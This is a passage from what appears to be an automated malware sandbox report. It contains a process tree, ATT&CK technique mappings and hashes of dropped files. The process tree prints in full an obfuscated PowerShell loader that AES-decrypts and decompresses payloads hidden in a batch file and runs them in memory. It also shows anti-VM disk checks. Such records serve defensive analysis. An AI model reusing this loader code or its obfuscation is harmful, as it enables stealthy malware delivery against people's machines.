"A"))));'.Replace('Jt', '');aQPr $xGG $null;aQPr $bQz $null;aQPr $urF (,[string[]] (''));
    3⤵
    PID:4068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4576
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loli.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
      4⤵
      Drops file in Windows directory
      PID:1856
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
      4⤵
      PID:3516
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:432
    - - C:\Windows\system32\fsutil.exe
        
        fsutil fsinfo drives
        5⤵
        
        PID:3468
    - - C:\Windows\system32\findstr.exe
        
        findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        5⤵
        
        PID:2300
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c echo function Hhsg($LiTn){ Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore '$DeVs=[heSheyshetheehemhe.heSheecheuherheihethey.heCrheyphetheohegherahephehyhe.heAheeheshe]:he:Cherheeahetehe(he);'.Replace('he', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$DeVs.MIHoIHdeIH=IH[IHSIHyIHsIHteIHmIH.IHSIHeIHcuIHriIHtyIH.IHCIHrIHypIHtIHogIHrIHaIHpIHhIHy.IHCiIHpIHheIHrMIHoIHdIHeIH]IH::IHCBIHC;'.Replace('IH', ''); Invoke-Expression -Verbose '$DeVs.Pljaljddljiljnljglj=lj[ljSyljsljtljeljmlj.Sljecljurljiljtljylj.Cljrljypljtljoljgljrljapljhylj.ljPaljddljiljnljgljMljodlje]lj:lj:PljKljCSlj7lj;'.Replace('lj', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$DeVs.KHheHhy=Hh[HhSHhyHhsHhtHhemHh.HhCHhoHhnHhveHhrtHh]:Hh:HhFHhrHhomHhBHhasHheHh6Hh4HhSHhtrHhinHhgHh("gHhbHh5jHhQHhWHhRHhKHhWHhZrHhgHhJHh9HhNHhDNHhseHhnGHhFHhNHhAHhBxHhNHhWxHhFHhsHh2HhKHhy8HhoaHhNHh0RHhp8HhMHh=");'.Replace('Hh', ''); Invoke-Expression -Debug -WarningAction Inquire '$DeVs.IUOVUO=[UOSUOyUOsUOtUOeUOm.UOCUOoUOnUOvUOerUOt]UO::UOFUOrUOoUOmBUOaUOseUO6UO4UOSUOtUOriUOngUO("VUORUOrPUOaUOhUOWUO+UOjUOBtUOXUOOUOTUORUOTxUO0eUOfbUOgUO=UO=");'.Replace('UO', ''); $wkZk=$DeVs.CreateDecryptor(); $NmOc=$wkZk.TransformFinalBlock($LiTn, 0, $LiTn.Length); $wkZk.Dispose(); $DeVs.Dispose(); $NmOc;}function DmpQ($LiTn){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire '$YiDY=Nszeszw-szOszbszjszeszcszt szSszyszssztszemsz.IszO.szMszeszmszorszyszStszrszeszaszm(,$LiTn);'.Replace('sz', ''); Invoke-Expression -Verbose '$wirR=Nszeszw-szOszbszjszeszcszt szSszyszssztszemsz.IszO.szMszeszmszorszyszStszrszeszaszm;'.Replace('sz', ''); Invoke-Expression -InformationAction Ignore -Verbose '$UvnG=NRleRlw-RlORlbRljRleRlcRlt RlSRlyRlsRltRlemRl.IRlO.RlCRloRlmRlprRleRlssRliRloRlnRl.RlGZRlipRlSRltrRleaRlmRl($YiDY, [RlIRlO.RlCRloRlmRlpRlrRlesRlsRliRloRlnRl.CRlomRlprRleRlsRlsRlioRlnRlMoRldRleRl]Rl:Rl:DRlecRloRlmpRlreRlsRls);'.Replace('Rl', ''); $UvnG.CopyTo($wirR); $UvnG.Dispose(); $YiDY.Dispose(); $wirR.Dispose(); $wirR.ToArray();}function aQPr($LiTn,$kClj){ Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire -Debug '$oOWF=[WWSWWysWWtWWeWWmWW.WWRWWefWWlWWeWWcWWtWWioWWn.WWAsWWsWWeWWmWWblWWyWW]:WW:WWLWWoWWaWWd([byte[]]$LiTn);'.Replace('WW', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire -Verbose '$SUjQ=$oOWF.EClnCltrClyClPCloCliClnClt;'.Replace('Cl', ''); Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore -Verbose '$SUjQ.SYISYnvSYoSYkSYeSY(SY$SYnuSYlSYlSY, $kClj);'.Replace('SY', '');}$ktyR = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $ktyR;$AWzc=[System.IO.File]::ReadAllText($ktyR).Split([Environment]::NewLine);foreach ($dMFJ in $AWzc) { if ($dMFJ.StartsWith('gbUIp')) { $OujB=$dMFJ.Substring(5); break; }}$JACM=[string[]]$OujB.Split('\');Invoke-Expression -Verbose -InformationAction Ignore -Debug '$xGG = DmpQ (Hhsg ([JtCJtonJtvJteJtrJttJt]Jt::JtFJtrJtoJtmJtBaJtseJt64JtSJttJtrJtinJtg($JACM[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Jt', '');Invoke-Expression -Verbose -WarningAction Inquire '$bQz = DmpQ (Hhsg ([JtCJtonJtvJteJtrJttJt]Jt::JtFJtrJtoJtmJtBaJtseJt64JtSJttJtrJtinJtg($JACM[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Jt', '');Invoke-Expression -Debug -Verbose -InformationAction Ignore -WarningAction Inquire '$urF = DmpQ (Hhsg ([JtCJtonJtvJteJtrJttJt]Jt::JtFJtrJtoJtmJtBaJtseJt64JtSJttJtrJtinJtg($JACM[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Jt', '');aQPr $xGG $null;aQPr $bQz $null;aQPr $urF (,[string[]] (''));
        5⤵
        
        PID:4748
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5036
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
        6⤵
        
        PID:5384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Enumerates system info in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4724
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba1b646f8,0x7ffba1b64708,0x7ffba1b64718
    3⤵
    PID:2088
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2044 /prefetch:2
    3⤵
    PID:4024
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:680
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
    3⤵
    PID:736
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
    3⤵
    PID:2764
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
    3⤵
    PID:4256
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:1
    3⤵
    PID:1644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:1
    3⤵
    PID:4272
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:8
    3⤵
    PID:4168
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:8
    3⤵
    PID:3224
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
    3⤵
    PID:5312
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4728 /prefetch:8
    3⤵
    PID:5688
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
    3⤵
    PID:672
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5996 /prefetch:8
    3⤵
    PID:5772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:8
    3⤵
    PID:4068
- - C:\Users\Admin\Downloads\onibye.exe
    "C:\Users\Admin\Downloads\onibye.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    PID:6000
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4576
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1
    3⤵
    PID:6036
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
    3⤵
    PID:220
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,16622101559252271754,14505461944455402960,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:1
    3⤵
    PID:2764
- C:\Windows\$nya-onimai2\iHGIHk.exe
  "C:\Windows\$nya-onimai2\iHGIHk.exe"
  2⤵
  - Executes dropped EXE
  PID:5684
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3588

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3800

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4028

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:4872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:5076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2676

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:468

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4536

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4812

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:772

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:1180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:1284

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:440

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:696

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1764

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 9f7d6aa095666446b029ddaae2788b50 E33RfHa+rkCTa1vPGnsa1w.0.1.0.0.0
1⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:1492
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:3988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:5304

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:5492

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:5412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
PID:5368

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:5436

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:5252

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:528
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 488 -p 3752 -ip 3752
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4168
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 472 -p 5900 -ip 5900
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D95.tmp.csv

Filesize
47KB

MD5
1c1df35961c06db78bbd96ba7d1f4475

SHA1
62b0522e55ad653d1d396a4791e68c491fb0cef0

SHA256
13ded8c01094053a8a5bf9684832f8f42f32d7183d877c9a8cd63def18b23aeb

SHA512
9179c8908d07c147717a29465d8798c10886927a84107ada82e51dd39dd67555331b20b6d2affbdd2f8a013cdddc8190800070dfc4da7a8e780f2c3c2a53ad27

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DC5.tmp.txt

Filesize
13KB

MD5
9a12f7593e455e4d6159b3049d4aa3f9

SHA1
af953a80209028c555834a080aeeed2687813ecf

SHA256
1b1b049df3aaed00f4a669390add74c3e35b9b46190d2a2e9d444f237facc0f4

SHA512
85c2749f86d4f03a70e355470039fa37ec84bc887de9a5dea9cb6cbcd382a5838291a815ac225850f9c4b7c8d6f042289d3200b33b3a8e6ece848e6a53b79acb

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2027.tmp.csv

Filesize
46KB

MD5
f060afe61fed971b1498624313824784

SHA1
7ef71e8a3e94a1279196cb89836f9aeea100c719

SHA256
b950a8739d1630171826742a85ad5adf75d99a4cabf170db7da268dbbcf2f493

SHA512
ce1b0aa8ea6ed04dbb1d637b03c9d2f66c32febf5c32edc409992a86ec3c608ee26a5e371b52312d63cd104c437112fb69f3c509f74071be61dc386ce51ede7c

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2048.tmp.txt

Filesize
13KB

MD5
cdd88973193725361fddb30236abb2cb

SHA1
d6209f6d5142151adc0835f284eb74a58e1a5f67

SHA256
caeef16219de95a2ac8b769a10c3b99633e8889ab4dfe23748a577cecbf19436

SHA512
fa4a6ee8b96a1c8b5c68ea07eed5e794dee060c3d389308ddb9c8e821bba836a1f368159fa7ff4ecb7a944056eea2014f04a02886de9eb34c67a647bc1317a09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\onibye.exe.log

Filesize
425B

MD5
fff5cbccb6b31b40f834b8f4778a779a

SHA1
899ed0377e89f1ed434cfeecc5bc0163ebdf0454

SHA256
b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

SHA512
1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
074db3a6469346f0984db93d9f6f0d8f

SHA1
cac8e72e2ebb92188242a02b79ea5f6b28e3eb22

SHA256
1f4b297a5c35acc494b9726b1f8d389f82ccb2bc2cd6caf4befafa440529005f

SHA512
dcbd3ca1ac5541fa78b21dc55d02a49d40292d6555bc88b9bda87d3f68618b39aa0688ffb6284111c6628fd2df818ca439e7f690fe2eedd44ace72d420b985b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a0486d6f8406d852dd805b66ff467692

SHA1
77ba1f63142e86b21c951b808f4bc5d8ed89b571

SHA256
c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be

SHA512
065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
dc058ebc0f8181946a312f0be99ed79c

SHA1
0c6f376ed8f2d4c275336048c7c9ef9edf18bff0

SHA256
378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a

SHA512
36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\395f127d-afd2-49d6-b2c5-ef50e25fb298.tmp

Filesize
6KB

MD5
90ba595e9b7953b348dff87cb908ba6a

SHA1
bd9e491c99d450b1e0c010f6d7357b0403880d8e

SHA256
bc87d7eb58e42818c8257047f17128d11cb645a3f3e79bcc93fe703836a5db82

SHA512
dbcdf85ce97d4f0b804aa06b4e3a126a36484f164ee27ec636ca3e6a2d938c508fe68b4bd369e51f567d8e9f495154c00657e12dcb18aebc0ac04760208e8de7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
251B

MD5
ef8e27ce7e7a43fbe763d9ccd60510f0

SHA1
46755fad35ce7c545436815b501ee4218efdc9db

SHA256
884d801b9ba6ea89a1101fdcdf2ca7b0e21e364a9756a769f0ef934c3c7f36f6

SHA512
8c87b6807a0e8c8f09e4fd5ffc2288e56bc037016636c05680dd3f6a0e98e8e2b84163f599921f9542c0f88fba87f241249b14d652465872ba7678edf6dce3fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
9b33d01807eaed564e50a2163176fca3

SHA1
1c23129fba80baa998aaca35b193c4a3b331ae60

SHA256
5273ba7208d4bbad2102c8ecfd722a58029bc160ca67fd52a2a3ddc2a5520bd5

SHA512
f8537ee9e90503dcf6adbe64961409979324dcb52ca52e9cd3a1e894107aa0ec26bef0a5ccc75e67e4c30accd64c7378ca0e10f5923bc5bacec85870a64c805a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a3778a53cf63870ff39e0d43ee4525cd

SHA1
0e70236c8c8110358aa22debd39db1d9b8c8b358

SHA256
4912935e6d08ae7c496265b353b6a5c35b0a0c8c9acea75fcbff7e995cd7b121

SHA512
413df564d743537136f5318f8d4bf301a33234b5fb2f952e3cbc0d8bdef97c113cd3f2a42beea62ca98c71a42bc212cc724a48c6d5cbdd5bcf930203c2f1de98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d0d57ed1a7c83c50bc2644c0546d17b5

SHA1
c99dd9ae36ed5469182faaa5f3ba64d56a28566a

SHA256
647872ea4f8373486155ae658ea755321c509812eadcb45602d10e55c1dd693e

SHA512
ba9ee36d858f03eb5ae7d4e64098c1a5da6e805cf4c4d635a4811e15f2fe12f36e81fb2193d0a8b73f03dc840c2a93a3ed98dbb3ee6e2fe1d71e796d0122a8e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
